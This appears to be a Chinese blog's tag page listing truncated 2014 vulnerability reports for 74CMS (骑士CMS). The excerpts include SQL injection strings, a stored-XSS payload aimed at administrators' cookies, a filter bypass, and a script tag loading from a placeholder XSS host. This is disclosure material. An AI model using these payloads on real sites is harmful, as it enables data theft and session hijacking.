标签 74CMS 下的文章

74cms(20141027)全局xss防护考虑不完善可被绕过

漏洞作者: 路人甲防护代码就不贴出来了,代码中只考虑了 新建标签的情况 或者在a img之类的标签节点中。但是没有考虑下面这种的情况<script> Var xx=”qiyeid”; </script>这样的话,我们就可以这样利用<script> Var xx=”qiyeid”;eval(‘documnet.write(js 8进制编码)’)// ...

没穿底裤 2014 年 12 月 08 日 暂无评论

74cms一处注入

漏洞作者: SLAckEr/wap/wap-company-show.php define('IN_QISHI', true); require_once(dirname(__FILE__).'/../include/common.inc.php'); require_once(QISHI_ROOT_PATH.'include/fun_wap.php'); require_o...

没穿底裤 2014 年 12 月 07 日 暂无评论

骑士CMS某新功能SQL注入

培训中心SQL注入。所以先注册一个培训中心的账号,然后去发不新课程,课程名用:cname'/*, 其他的随便填写。然后使用用户的身份登录其申请课程:随便填写:提交即返回错误:我们把其他说明改为:code 区域 */,3,1, 200, concat(user(),0x0a,version()) , 1, 1413525884)# 然后提交即成功。这个时候用培训中心的账号,查看课程申请:可...

没穿底裤 2014 年 11 月 16 日 暂无评论

74cms SQL注入漏洞

骑士PHP人才系统:74cms_v3.5.1_20141020.zip 之前出的 最新版本 漏洞文件:\wap\personal\wap_apply.php [php] elseif ($act == 'apply_add') { $_POST=array_map("utf8_to_gbk", $_POST); $sql="select * from ".table("personal_...

没穿底裤 2014 年 11 月 13 日 暂无评论

骑士CMS存储型XSS两枚专打管理员

1. 首页>招聘信息>职位详情在页面里面可以看到“举报”点击举报,输入: [php] 我要举报这个骗人的职位,这家公司是流氓什么什么什么什么什么" style="a:expre/**/ssion(eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105...

没穿底裤 2014 年 11 月 13 日 暂无评论

骑士人才(74CMS)3.X通杀XSS

Author:毒药 这个XSS好像是从12年3.1开始就存在的吧,到现在的3.4还是没有修复。漏洞页面:link/add_link.php 友情链接:LOGO处填写[php]><script src=http://xss地址></script> //将<>进行16进制编码[/php] add_link.php [php] $setsqlarr['li...

没穿底裤 2014 年 03 月 21 日 暂无评论